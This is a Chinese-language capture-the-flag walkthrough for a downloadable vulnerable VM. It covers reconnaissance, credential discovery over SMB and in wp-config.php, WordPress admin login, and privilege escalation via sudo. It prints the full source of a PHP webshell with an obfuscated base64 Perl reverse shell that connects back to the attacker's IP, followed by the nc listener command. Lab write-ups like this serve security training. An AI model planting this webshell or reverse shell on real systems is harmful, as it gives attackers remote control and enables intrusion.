靶機下載鏈接: https://pan.baidu.com/s/1MMkgaYLRc78YX4s6nvqdjQ 提取碼: djpm

• 信息收集

查看kali的IP

使用nmap 192.168.101.0/24 探測靶機IP

發現開放445端口，并且開放的服務microsoft-ds。可以用enum4linux工具來掃描共享文件，使用方法: enum4linux 192.168.101.103

允許空的賬號密碼訪問

共享文件夾名字

windows訪問共享文件:\\192.168.101.103\文件夾名稱

打開deets.txt文件的的時候發現了一個密碼，內容如下：

知識介紹：WordPress是使用PHP語言開發的博客平臺，用戶可以在支持PHP和MySQL數據庫的服務器上架設屬于自己的網站。也可以把 WordPress當作一個內容管理系統（CMS）來使用。

在word press/wp-config.php文件里面發現了一套數據庫的用戶密碼

該靶機開放了80端口，訪問一下http://192.168.101.103看看能不能訪問

可以訪問192.168.101.103，先dirb掃描一下看看該網站都有哪些目錄，使用方法：dirb http://192.168.101.103

發現了幾個可以用的網址

二、Wordpress獲取主機權限

1. Wordpress登錄地址。http://192.168.101.103/wordpress/wp-admin

已經成功用剛才收集到的用戶名密碼登錄到管理的后臺

2.修改404頁面，寫入webshell。Appearnce——editor——404.php。目的是將webshell.php源碼拷貝到404.php

Webshell.php源碼

<?php

function which($pr) {

$path = execute("which $pr");

return ($path ? $path : $pr);

}

function execute($cfe) {

$res = '';

if ($cfe) {

if(function_exists('exec')) {

@exec($cfe,$res);

$res = join("\n",$res);

} elseif(function_exists('shell_exec')) {

$res = @shell_exec($cfe);

} elseif(function_exists('system')) {

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

} elseif(@is_resource($f = @popen($cfe,"r"))) {

$res = '';

while(!@feof($f)) {

$res .= @fread($f,1024);

}

@pclose($f);

}

}

return $res;

}

function cf($fname,$text){

if($fp=@fopen($fname,'w')) {

@fputs($fp,@base64_decode($text));

@fclose($fp);

}

}

$yourip = "192.168.101.10";? 注意這里是kali的IP

$yourport = '4444';

$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".

"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".

"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".

"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".

"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".

"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".

"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc',$back_connect);

$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

?>

3.訪問404頁面，反向鏈接：（前面是先在控制端開啟監聽），然后訪問http://192.168.101.103/wordpress/wp-content/themes/twentyfifteen/404.php

監聽方法 nc -lvvp 4444

優化命令執行終端，執行下面命令進入python交互式(注意要下載python環境才能運行):

查看/home下面有什么用戶，嘗試之前的信息收集收到的密碼，成功登錄togie

三、提權

查看togie有啥權限，用sudo su獲取root權限

拿到flag